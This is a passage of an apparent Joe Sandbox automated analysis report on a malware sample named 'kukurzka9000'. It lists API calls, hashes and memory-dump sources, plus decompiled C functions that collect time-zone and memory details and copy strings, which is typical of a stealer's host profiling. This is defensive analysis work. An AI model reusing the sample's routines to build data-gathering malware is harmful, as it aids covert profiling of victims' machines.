                                                                                                                                                                        0x00409275
                                                                                                                                                                        0x0040927a
                                                                                                                                                                        0x0040927c
                                                                                                                                                                        0x00409287
                                                                                                                                                                        0x00409287
                                                                                                                                                                        0x00409298
                                                                                                                                                                        0x0040929a
                                                                                                                                                                        0x004092a8
                                                                                                                                                                        0x004092ae
                                                                                                                                                                        0x004092be
                                                                                                                                                                        0x004092c0
                                                                                                                                                                        0x004092cc

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,00409A6B,00000000,00000000,00000000,00000000), ref: 0040927C
                                                                                                                                                                        • wsprintfW.USER32 ref: 004092A8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004092C0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFreeLastLocalwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1841941599-1731603023
                                                                                                                                                                        • Opcode ID: 61c74038a4c9bce772878d69340abaaaaec3cd88705967fe1fdac89ad50af943
                                                                                                                                                                        • Instruction ID: 0b687450064c760a884eb7835e75b8405e51eba9b0f5ac012d2d402204ee40d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 61c74038a4c9bce772878d69340abaaaaec3cd88705967fe1fdac89ad50af943
                                                                                                                                                                        • Instruction Fuzzy Hash: 50F0F6712002206BD7109BAAED49F1BB7E8EB84710F00483AFA15E7290DAB099218B9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,02398FDF,00000000,00000000,00000000,00000000), ref: 023987F0
                                                                                                                                                                        • wsprintfW.USER32 ref: 0239881C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02397092), ref: 02398834
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFreeLastLocalwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1841941599-1731603023
                                                                                                                                                                        • Opcode ID: 39e78de9c2088751e3ac43fba03060a7497b8e379ff188893502746336a2731c
                                                                                                                                                                        • Instruction ID: 7610e1a2eee3f88c6f62c007e2376fc8e8d9dcd28c1636eedf36a8b2426e3d38
                                                                                                                                                                        • Opcode Fuzzy Hash: 39e78de9c2088751e3ac43fba03060a7497b8e379ff188893502746336a2731c
                                                                                                                                                                        • Instruction Fuzzy Hash: B3F096722002205BD7109BAA9D49F1BB7E9EB85750F10483AF655E7250DAB0D9118B9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                        			E0040919C(intOrPtr* _a4) {
                                                                                                                                                                        				struct _TIME_ZONE_INFORMATION _v176;
                                                                                                                                                                        				void* _t8;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				GetTimeZoneInformation( &_v176);
                                                                                                                                                                        				_t20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_push( ~(_v176.Bias));
                                                                                                                                                                        				_t8 = 0x2b;
                                                                                                                                                                        				_t15 =  >  ? _t8 : 0;
                                                                                                                                                                        				wsprintfW(_t20,  *0x40e2f4,  >  ? _t8 : 0);
                                                                                                                                                                        				_t21 = _a4;
                                                                                                                                                                        				 *_t21 = E0040A503( *_t21, _t20);
                                                                                                                                                                        				LocalFree(_t20);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}







                                                                                                                                                                        0x004091ae
                                                                                                                                                                        0x004091cc
                                                                                                                                                                        0x004091ce
                                                                                                                                                                        0x004091d1
                                                                                                                                                                        0x004091d4
                                                                                                                                                                        0x004091df
                                                                                                                                                                        0x004091e5
                                                                                                                                                                        0x004091f5
                                                                                                                                                                        0x004091f7
                                                                                                                                                                        0x00409203

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,-00000014,74655850), ref: 004091AE
                                                                                                                                                                        • wsprintfW.USER32 ref: 004091DF
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004091F7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Freelstrlen$GlobalInformationLocalTimeZonewsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 184722451-1731603023
                                                                                                                                                                        • Opcode ID: 2d64fd953e2079bb0131af5d72d69c5c3290959d80b8fbaa26ba35f8ce1fb5e5
                                                                                                                                                                        • Instruction ID: 22640a5e82af922e2c0672ad49884a71deb67002d2383c126f26ce4509f9bf47
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d64fd953e2079bb0131af5d72d69c5c3290959d80b8fbaa26ba35f8ce1fb5e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF096B1700210AFF714AB6AED05F6BB7F9EFC9710F008839FA46E7150D6B499118A69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,-00000014,0040E044), ref: 02398722
                                                                                                                                                                        • wsprintfW.USER32 ref: 02398753
                                                                                                                                                                          • Part of subcall function 02399A77: GlobalFree.KERNEL32(02391F22), ref: 02399AC4
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0239876B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$GlobalInformationLocalTimeZonewsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2962336667-1731603023
                                                                                                                                                                        • Opcode ID: 2ce0da1acc3758be5041b8d15ea4536ab3a5399006eb78e8167eb4b8e07620a5
                                                                                                                                                                        • Instruction ID: 77847be1aae4552702e096ace1bf96c39c511abb343d1505efb16deb9127a6c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ce0da1acc3758be5041b8d15ea4536ab3a5399006eb78e8167eb4b8e07620a5
                                                                                                                                                                        • Instruction Fuzzy Hash: 66F062B1600210AFE714AB69DD05F6BB7E9EF89710F008839EA46E7150D6B099118A65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 02395ACF
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02395AE9
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02395B3E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$ByteCharMultiWide
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 1839797009-1731603023
                                                                                                                                                                        • Opcode ID: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
                                                                                                                                                                        • Instruction ID: da87ec6ca7efe17b775187839252f71d95038c984c1823c823ea06fbc5aca470
                                                                                                                                                                        • Opcode Fuzzy Hash: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
                                                                                                                                                                        • Instruction Fuzzy Hash: 02416DB1A00215AFEB15CBA6DD81FBEBBB8EF89710F104429F604F7290D7B45911CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00409517
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 00409546
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040956F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Freelstrlen$Local$Global
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3528464136-1731603023
                                                                                                                                                                        • Opcode ID: f888b3dfec9be0e9616b7d9d0a221dccdfdd0719e878ec4084107cc7add3ab46
                                                                                                                                                                        • Instruction ID: 82c85e4b8355b08b61bbd5904165d64d2f3f4985be938a61cd8515a488971c1f
                                                                                                                                                                        • Opcode Fuzzy Hash: f888b3dfec9be0e9616b7d9d0a221dccdfdd0719e878ec4084107cc7add3ab46
                                                                                                                                                                        • Instruction Fuzzy Hash: CA21A1B1500211AFE314DF66DD84D2BB7ECEBC8720F00883DF954A72A0E674AD158BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 18%
                                                                                                                                                                        			E00408A42(void* _a4, char _a8) {
                                                                                                                                                                        				signed int _t8;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                        				_t8 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e2d0);
                                                                                                                                                                        				_t29 = _t8;
                                                                                                                                                                        				if(_t29 != 0) {
                                                                                                                                                                        					_t30 = _t29 + 0x10;
                                                                                                                                                                        					_t10 =  *((intOrPtr*)( *0x40e18c))(_t30,  *0x40e1f0);
                                                                                                                                                                        					if(_t10 == 0) {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						_a4 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t30, _t31) + _t12);
                                                                                                                                                                        						if(E0040A3E4(_t30,  &_a4, 0, _t22) != 0) {
                                                                                                                                                                        							_t4 =  &_a8; // 0x407be3
                                                                                                                                                                        							_t33 =  *_t4;
                                                                                                                                                                        							 *_t33 =  *((intOrPtr*)( *0x40e13c))( *_t33, _a4);
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_push(0xfffffffd);
                                                                                                                                                                        							_pop(1);
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_a4);
                                                                                                                                                                        						return 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t24 = _t10 - _t30;
                                                                                                                                                                        					_t22 = _t24 >> 1;
                                                                                                                                                                        					if(_t24 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t20 = 0xfffffffe;
                                                                                                                                                                        					return _t20;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t8 | 0xffffffff;
                                                                                                                                                                        			}












                                                                                                                                                                        0x00408a52
                                                                                                                                                                        0x00408a57
                                                                                                                                                                        0x00408a59
                                                                                                                                                                        0x00408a5d
                                                                                                                                                                        0x00408a6f
                                                                                                                                                                        0x00408a73
                                                                                                                                                                        0x00408a77
                                                                                                                                                                        0x00408a86
                                                                                                                                                                        0x00408aa2
                                                                                                                                                                        0x00408ab0
                                                                                                                                                                        0x00408ab7
                                                                                                                                                                        0x00408ab7
                                                                                                                                                                        0x00408ac6
                                                                                                                                                                        0x00408ab2
                                                                                                                                                                        0x00408ab2
                                                                                                                                                                        0x00408ab4
                                                                                                                                                                        0x00408ab4
                                                                                                                                                                        0x00408ace
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408ad6
                                                                                                                                                                        0x00408a7b
                                                                                                                                                                        0x00408a7d
                                                                                                                                                                        0x00408a7f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408a83
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408a83
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: pXet${@
                                                                                                                                                                        • API String ID: 0-1482461547
                                                                                                                                                                        • Opcode ID: 255823ef086db5813c22c978924e906316e0a6f5fbde3c262ce37af4251633b4
                                                                                                                                                                        • Instruction ID: 8d5eba686dcfbb8260fa6a6421df57112b72329cd8ad35a8f669febc4932704e
                                                                                                                                                                        • Opcode Fuzzy Hash: 255823ef086db5813c22c978924e906316e0a6f5fbde3c262ce37af4251633b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 62110D32300214BFDB018F69DE40D6A3BA5EB88370B144537FA54F72E0DE749C119BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E0040A3E4(intOrPtr __ecx, intOrPtr* __edx, signed int _a4, signed int _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr* _v12;
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				void _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t34;
                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        
                                                                                                                                                                        				_t27 = __edx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_t18 = LocalAlloc(0x40, 0x80 +  *((intOrPtr*)( *0x40e08c))(__ecx, _t34, _t37, _t26, __ecx, __ecx) * 2);
                                                                                                                                                                        				_t31 = _a4;
                                                                                                                                                                        				_t39 = _t18;
                                                                                                                                                                        				_t35 = _a8;
                                                                                                                                                                        				if(_t31 < _t35) {
                                                                                                                                                                        					_t29 = _v8;
                                                                                                                                                                        					_t33 = _t39;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t25 =  *((intOrPtr*)(_t29 + _t31 * 2));
                                                                                                                                                                        						_t31 = _t31 + 1;
                                                                                                                                                                        						 *_t33 = _t25;
                                                                                                                                                                        						_t33 = _t33 + 2;
                                                                                                                                                                        					} while (_t31 < _t35);
                                                                                                                                                                        					_t27 = _v12;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((short*)(_t39 + 2 + _t35 * 2)) = 0;
                                                                                                                                                                        				 *_t27 =  *((intOrPtr*)( *0x40e13c))( *_t27, _t39);
                                                                                                                                                                        				if(_t39 != 0) {
                                                                                                                                                                        					LocalFree(_t39);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}
















                                                                                                                                                                        0x0040a3f6
                                                                                                                                                                        0x0040a3fa
                                                                                                                                                                        0x0040a3fd
                                                                                                                                                                        0x0040a40c
                                                                                                                                                                        0x0040a40e
                                                                                                                                                                        0x0040a411
                                                                                                                                                                        0x0040a413
                                                                                                                                                                        0x0040a418
                                                                                                                                                                        0x0040a41a
                                                                                                                                                                        0x0040a41d
                                                                                                                                                                        0x0040a41f
                                                                                                                                                                        0x0040a41f
                                                                                                                                                                        0x0040a423
                                                                                                                                                                        0x0040a424
                                                                                                                                                                        0x0040a427
                                                                                                                                                                        0x0040a42a
                                                                                                                                                                        0x0040a42e
                                                                                                                                                                        0x0040a42e
                                                                                                                                                                        0x0040a436
                                                                                                                                                                        0x0040a442
                                                                                                                                                                        0x0040a446
                                                                                                                                                                        0x0040a449
                                                                                                                                                                        0x0040a449
                                                                                                                                                                        0x0040a456

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID: pXet$y@
                                                                                                                                                                        • API String ID: 2012307162-1785394153
                                                                                                                                                                        • Opcode ID: 4474e2624ff501794f5b6952b0a2c85f8b148a46dd5bd5a8f3d68c93b8c9b259
                                                                                                                                                                        • Instruction ID: f3cb8fed4fc86e8926e4ae745f77bd99f1ad2e4c346b1d96af304dd36abb34b3
                                                                                                                                                                        • Opcode Fuzzy Hash: 4474e2624ff501794f5b6952b0a2c85f8b148a46dd5bd5a8f3d68c93b8c9b259
                                                                                                                                                                        • Instruction Fuzzy Hash: 8501D475610224AFDB15CF99DC80DAE77F9EF8C720B10856AE905E7310E770AD11CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E0040A457(char __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				intOrPtr* _v12;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t35;
                                                                                                                                                                        
                                                                                                                                                                        				_t22 = __edx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_t14 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e198))(__ecx, _t30, _t33, _t21, __ecx, __ecx) + 0x40);
                                                                                                                                                                        				_t26 = _a4;
                                                                                                                                                                        				_t35 = _t14;
                                                                                                                                                                        				_t31 = _a8;
                                                                                                                                                                        				if(_t26 < _t31) {
                                                                                                                                                                        					_t5 =  &_v8; // 0x406f4f
                                                                                                                                                                        					_t24 =  *_t5;
                                                                                                                                                                        					_t29 = _t35 - _t26;
                                                                                                                                                                        					do {
                                                                                                                                                                        						 *((char*)(_t29 + _t26)) =  *((intOrPtr*)(_t26 + _t24));
                                                                                                                                                                        						_t26 = _t26 + 1;
                                                                                                                                                                        					} while (_t26 < _t31);
                                                                                                                                                                        					_t22 = _v12;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((char*)(_t35 + _t31 + 1)) = 0;
                                                                                                                                                                        				 *_t22 =  *((intOrPtr*)( *0x40e050))( *_t22, _t35);
                                                                                                                                                                        				if(_t35 != 0) {
                                                                                                                                                                        					LocalFree(_t35);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}















                                                                                                                                                                        0x0040a469
                                                                                                                                                                        0x0040a46d
                                                                                                                                                                        0x0040a470
                                                                                                                                                                        0x0040a47b
                                                                                                                                                                        0x0040a47d
                                                                                                                                                                        0x0040a480
                                                                                                                                                                        0x0040a482
                                                                                                                                                                        0x0040a487
                                                                                                                                                                        0x0040a489
                                                                                                                                                                        0x0040a489
                                                                                                                                                                        0x0040a48e
                                                                                                                                                                        0x0040a490
                                                                                                                                                                        0x0040a493
                                                                                                                                                                        0x0040a496
                                                                                                                                                                        0x0040a497
                                                                                                                                                                        0x0040a49b
                                                                                                                                                                        0x0040a49b
                                                                                                                                                                        0x0040a4a6
                                                                                                                                                                        0x0040a4ad
                                                                                                                                                                        0x0040a4b1
                                                                                                                                                                        0x0040a4b4
                                                                                                                                                                        0x0040a4b4
                                                                                                                                                                        0x0040a4c1

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000040,?,00406F4F,00000000), ref: 0040A47B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00406F4F,00000000), ref: 0040A4B4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID: Oo@$pXet
                                                                                                                                                                        • API String ID: 2012307162-2500478431
                                                                                                                                                                        • Opcode ID: e0af48a418b7598e3cbf6c1ac09c0b31020e59559928c2411f0180abe491ed61
                                                                                                                                                                        • Instruction ID: 5b8de7bcfa6d1d8a957f95a4a74ef6cb880f43f11ca786fae3c3bbd8513ebd6a
                                                                                                                                                                        • Opcode Fuzzy Hash: e0af48a418b7598e3cbf6c1ac09c0b31020e59559928c2411f0180abe491ed61
                                                                                                                                                                        • Instruction Fuzzy Hash: EE01F271A04220AFD715CFAADC80AAA7FE9EF8A320B14446DE648E7301C270AD0187A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0040942A(intOrPtr* _a4) {
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char _v68;
                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_t30 = 0x40;
                                                                                                                                                                        				_v68 = _t30;
                                                                                                                                                                        				_t11 =  *((intOrPtr*)( *0x40e02c))( &_v68);
                                                                                                                                                                        				if(_t11 != 0) {
                                                                                                                                                                        					_t28 =  *((intOrPtr*)( *0x40e044))(_t30, 0x400, _t27);
                                                                                                                                                                        					wsprintfW(_t28,  *0x40e290, (_v56 << 0x00000020 | _v60) >> 0x14, _v56 >> 0x14);
                                                                                                                                                                        					_t31 = _a4;
                                                                                                                                                                        					 *_t31 = E0040A503( *_t31, _t28);
                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t11 | 0xffffffff;
                                                                                                                                                                        			}











                                                                                                                                                                        0x0040943b
                                                                                                                                                                        0x0040943d
                                                                                                                                                                        0x00409440
                                                                                                                                                                        0x00409444
                                                                                                                                                                        0x0040945c
                                                                                                                                                                        0x00409471
                                                                                                                                                                        0x00409477
                                                                                                                                                                        0x00409487
                                                                                                                                                                        0x00409489
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409492
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfW.USER32 ref: 00409471
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A7D,00000000), ref: 00409489
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocalwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 988369812-1731603023
                                                                                                                                                                        • Opcode ID: 74b29ddea5bb53726f524591325f7cb1bfeb28a979157633f456ffd460b72521
                                                                                                                                                                        • Instruction ID: 691c7a2968302921ddf9a2c3bc51e1d1d0e2bb0df5734c172083d1d357432de7
                                                                                                                                                                        • Opcode Fuzzy Hash: 74b29ddea5bb53726f524591325f7cb1bfeb28a979157633f456ffd460b72521
                                                                                                                                                                        • Instruction Fuzzy Hash: 6501D671A00114ABD700DF6AEC04E6FBBB9EB84324B00453DF616F7291D6749912C7A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • wsprintfW.USER32 ref: 023989E5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02398FF1,00000000), ref: 023989FD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocalwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 988369812-1731603023
                                                                                                                                                                        • Opcode ID: 3d3ee9e39cbad5d7baf97f18bd1515f05ce169efab988a665b2b1dba638ea594
                                                                                                                                                                        • Instruction ID: 8ee9641559f5f96250b858d2e7ceb7fb62a35af6b73ff2e1a1f66014398098c0
